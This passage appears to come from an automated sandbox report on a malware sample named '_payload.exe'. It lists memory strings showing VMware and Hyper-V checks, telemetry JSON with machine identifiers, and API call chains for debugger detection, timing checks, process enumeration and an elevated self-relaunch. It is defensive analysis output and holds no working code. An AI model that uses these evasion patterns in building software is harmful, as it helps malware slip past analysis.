              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1961780221.0000000003770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/04/2023 10:55:35.770OFFICECL (0x1988)0x75cTelemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 21, "Time": "2023-10-04T09:55:05Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1959501521.0000000003770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/03/2023 13:09:52.535OFFICECL (0x2394)0x12d8Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 11, "Time": "2023-10-03T12:09:52Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1956219802.0000000003772000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware20,1
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1962629426.0000000003770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/04/2023 11:53:18.526OFFICECL (0x1db0)0x1dd4Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 17, "Time": "2023-10-04T10:52:48Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000003.1658782762.0000000000B06000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000B06000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1676063255.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385543393.0000000000A30000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001379000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001310000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000003.1658782762.0000000000B06000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000B06000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1963130680.0000000003770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/04/2023 11:57:12.660OFFICECL (0x648)0x1fe0Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 20, "Time": "2023-10-04T10:57:11Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1962072949.0000000003770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/04/2023 11:52:10.031OFFICE~1 (0x1b38)0x1748Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 13, "Time": "2023-10-04T10:52:08Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1962329518.0000000003770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/04/2023 11:52:10.346OFFICE~1 (0x708)0x1044Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 13, "Time": "2023-10-04T10:52:10Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.0000000000886000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000003.1756065318.0000000000886000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%((
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeAPI call chain: ExitProcess graph end nodegraph_0-38464
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00461178 rdtsc 0_2_00461178
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00484168 _memset,IsDebuggerPresent,0_2_00484168
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0048A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0048A57A
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_004E1920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_004E1920
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00472220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00472220
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_004878D5 GetProcessHeap,0_2_004878D5
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_004929EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004929EC
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_004929BB SetUnhandledExceptionFilter,0_2_004929BB
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_004929EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004929EC
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_004929BB SetUnhandledExceptionFilter,2_2_004929BB
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E629EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00E629EC
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E629BB SetUnhandledExceptionFilter,3_2_00E629BB
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E629EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00E629EC
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E629BB SetUnhandledExceptionFilter,4_2_00E629BB
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeProcess created: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe "C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --Admin IsNotAutoStart IsNotTask
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00461000 cpuid 0_2_00461000
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_00498178
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_004A0116
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004982A2
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_0049834F
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,0_2_00498423
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,0_2_004987C8
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,0_2_0049884E
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,0_2_00497BB3
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,0_2_00497E27
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00497E83
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00497F00
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_00497F83
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00498178
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_004A0116
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004982A2
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0049834F
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00498423
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,2_2_004987C8
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,2_2_0049884E
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00497BB3
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,2_2_00497E27
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00497E83
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00497F00
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00497F83
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_00E68178
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00E70116
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00E682A2
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_00E6834F
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,3_2_00E68423
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,3_2_00E687C8
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: GetLocaleInfoW,3_2_00E6884E
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,3_2_00E67BB3
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00E67E83
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: EnumSystemLocalesW,3_2_00E67E27
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_00E67F83
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00E67F00
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,4_2_00E68178
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_00E70116
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00E682A2
